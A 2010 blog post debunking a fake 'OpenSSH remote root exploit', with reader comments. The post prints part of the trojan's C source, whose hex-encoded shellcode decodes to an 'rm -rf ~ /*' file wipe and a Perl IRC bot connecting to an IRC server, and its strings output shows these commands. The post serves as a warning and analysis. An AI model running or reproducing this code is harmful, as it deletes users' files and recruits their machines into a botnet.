Yet Another Fake Exploit

Posted: February 7th, 2010 | Author: | Filed under: IT Related | Tags: , , , , | 9 Comments »

PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”

Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..

xanda:tmp adnan$ cd /tmp
 
xanda:tmp adnan$ mkdir lame
 
xanda:tmp adnan$ cd lame/
 
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28--  http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'
 
100%[=========================================================================================================================================>] 13,273      7.82K/s   in 1.7s    
 
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]
 
xanda:lame adnan$ more openssh-53p1-remote-root.c 
 
/* openssh-53p1-remote-root.c
* OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
* Email: root@chamillionaire.com
* Release date: Unreleased (private) / 2010
* Available Patch: No fix-patch has been issued or reported.
*
* -----------------
* Additional Notes:
* -----------------
* By using this software, you take any and/or all responsibility
* for the damage(s) caused and will not bitch to me, the|one, about it.
*
* USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
 
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
 
char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
 
char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
 
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
 
xanda:lame adnan$ strings fake | more
 
the|one is rooting your Linux/FreeBSD Network
  Usage: %s -h <host> -p port
  Options:
-h ip/host of target
-p port
-d username
-B memory_limit 8/16/64
Root is required for raw sockets, etc.
  [+] the|one's OpenSSH Remote Root Exploit - 2010
  [-] Resolving Failed
  [-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
  [-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl

knock knock knock… script kiddies.. grow up!


9 Comments on “Yet Another Fake Exploit”

  1. 1 heh said at 8:53 PM on February 7th, 2010:

    The exploit itself exists. However, the release of it won’t happen. That was created for little skiddies who just use and abuse other peoples work with no appreciation. But I do agree, script kiddies definitely need to grow up.

    Later

  2. 2 xanda said at 9:01 PM on February 7th, 2010:

    @heh
    i wish it is exist 🙂

  3. 3 heh said at 9:06 PM on February 7th, 2010:

    @xanda
    It does, heh. :>

    Perhaps in the near future it will be released but for now, it’s going to remain discrete mainly for reasons such as this. The launch of this was only a test to see how fast it would spread. The file was only hosted for approximately 10 minutes and already, it’s blasted on pastebins, sites, etc.

    Good luck on your blog,

    the|one

  4. 4 heh said at 9:15 PM on February 7th, 2010:

    Though I must admit I love the false information provided on that PenTestIT site.

    openssh-53p1-remote-root.c

    by Black on February 7, 2010 · 0 comments

    in Source Code

    This is an unreleased, private 0day, which we found on an un-secure of a person who was trying to root us.
    Use it on your own production environment and handle with care! We should not be held responsible for damages occurring out of the use of this source code.

    I especially dig the

    found on an un-secure of a person who was trying to root us.

    That’s just gold, hah.

  5. 5 heh said at 9:15 PM on February 7th, 2010:

    Bah.. your site doesn’t support it.

    Later

  6. 6 xanda said at 9:28 PM on February 7th, 2010:

    @heh
    dont use bbcode, use html.. this is wordpress and not phpbb 🙂

  7. 7 تحويل الـ Shellcode من Hex إلى Binary و العكس | مجتمع الحماية العربي said at 10:17 AM on January 14th, 2011:

    […] من أن تستخدم Shellcode غير موثوق و اعرف محتويات هذا الملف (لأنه يقد يحتوي على أوامر تضر بنظامك!!) بالطرق […]

  8. 8 Exploit writing tutorial part 9 : Introduction to Win32 shellcoding | Corelan Team said at 4:06 AM on May 25th, 2014:

    […] you can also use the “strings” command in linux (as explained here). Write the entire shellcode bytes to a file and then run “strings” on it […]

  9. 9 58 said at 12:07 AM on March 15th, 2021:

    I want to enter the world of hackers


Leave a Reply